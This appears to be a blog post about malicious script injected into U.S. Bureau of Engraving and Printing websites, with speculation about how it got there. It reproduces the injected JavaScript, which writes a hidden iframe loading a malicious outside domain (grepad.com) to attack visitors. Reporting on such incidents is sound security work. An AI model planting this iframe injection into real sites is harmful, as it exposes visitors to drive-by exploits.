It was announced by AVG that the websites: bep.gov (Bureau of Engraving and Printing), bep.treas.gov and moneyfactory.gov were injected with a malscript:

<SCR IPT (space added)>
           function addCookie(name, value, hours)
           {
                 var date = new Date();
                date.setTime(date.getTime()+(hours*3600000));
                var expires ”; expires=”+date.toGMTString();
               document.cookie = name+”=”+value+expires+”; “;
          }

document.write(‘<iframe frameborder=”0″ onload=\’ if (!this.src){
this.src=”http://grepad.com/in.cgi?3″; this.height=0; this.width=0;} \’></iframe>’);
addCookie(“cook”, “1″, 24);
</SCR IPT (space added)>

According to this webpage: http://news.softpedia.com/news/Department-of-the-Treasury-Website-Rigged-to-Exploit-Visitors-141277.shtml ”Panda analysts speculate that hackers used a common attack technique known as SQL injection, to compromise the U.S. Treasury website. However, other experts think the incident is related to the recent mass compromise at Network Solutions, where the website is hosted. This possibility is enforced by the use of the malicious grepad.com domain in both attacks.”

However, it could also be that someone with FTP access to the website had a virus. The virus steals FTP login credentials and sends them to a server which then infects the websites it has legitimate access to. I see no mention of that possibility. Being that this code was injected after the closing html tag, I doubt very seriously that it’s a SQL injection, possible, but highly unlikely.

Could it have been part of the larger compromise at the hosting provider? Possibly, although last I heard and read, they had cleaned that all up and I know that the first round targeted WordPress blogs, but later repeat attacks targeted all websites at the hosting provider.

 It could have been that these sites were untouched until now? We may never know. But I do know that Network Solutions has always responded quickly to infections and taken responsibility when the “stuff” hits the fan. I have applauded them before and I do so now as well.

 Could this be more finger pointing at someone other than who’s responsible? No, that never happens in the government – does it?

Please leave your comments below…

Thank you.